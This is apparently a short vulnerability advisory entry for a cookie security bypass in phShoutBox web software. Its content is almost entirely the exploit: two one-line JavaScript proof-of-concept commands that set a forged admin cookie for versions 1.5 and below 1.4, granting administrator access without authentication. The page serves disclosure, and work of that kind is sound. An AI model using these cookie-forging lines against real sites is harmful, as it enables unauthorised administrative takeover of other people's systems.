• info
• discussion
• exploit
• solution
• references

phShoutBox Cookie Security Bypass Vulnerability

The following proof-of-concept JavaScript code to create a cookie is available:

version 1.5: javascript:document.cookie = "phadmin=True; path=/;";
version < 1.4: javascript:document.cookie = "ssbadmin=True; path=/;";